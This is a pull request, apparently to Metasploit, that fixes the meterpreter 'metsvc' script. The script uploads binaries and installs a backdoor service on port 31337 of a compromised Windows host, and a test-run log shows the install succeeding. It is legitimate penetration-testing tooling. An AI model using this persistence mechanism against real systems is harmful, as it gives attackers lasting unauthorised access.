### PR TITLE
Fix metsrv.dll name issue in metsvc script

### DIFF
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@@ -70,11 +70,21 @@ if client.platform =~ /win32|win64/
   print_status("Creating a temporary installation directory #{tempdir}...")
   client.fs.dir.mkdir(tempdir)
 
-  %W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
-    next if (bin != "metsvc.exe" and remove)
-    print_status(" >> Uploading #{bin}...")
-    fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
-    fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
+  # Use an array of `from -> to` associations so that things
+  # such as metsrv can be copied from the appropriate location
+  # but named correctly on the target.
+  bins = {
+    'metsrv.x86.dll'    => 'metsrv.dll',
+    'metsvc-server.exe' => nil,
+    'metsvc.exe'        => nil
+  }
+
+  bins.each do |from, to|
+    next if (from != "metsvc.exe" and remove)
+    to ||= from
+    print_status(" >> Uploading #{from}...")
+    fd = client.fs.file.new(tempdir + "\\" + to, "wb")
+    fd.write(::File.read(File.join(based, from), ::File.size(::File.join(based, from))))
     fd.close
   end
 


### PR DESCRIPTION
As mentioned here https://community.rapid7.com/thread/3788 the metsvc script was still looking for the old file name for metsrv.dll, which was causing the script to fail.

This commit fixes this issue. A hash is used to indicate local (`from`) and remote (`to`) file names so that the remote can continue to use metsrv.dll, but it is correctly located on disk locally. If a remote name isn't specified, the local one is used instead.

Test run:

```
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\OJ\AppData\Local\Temp\FnuwTWzMV...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
```
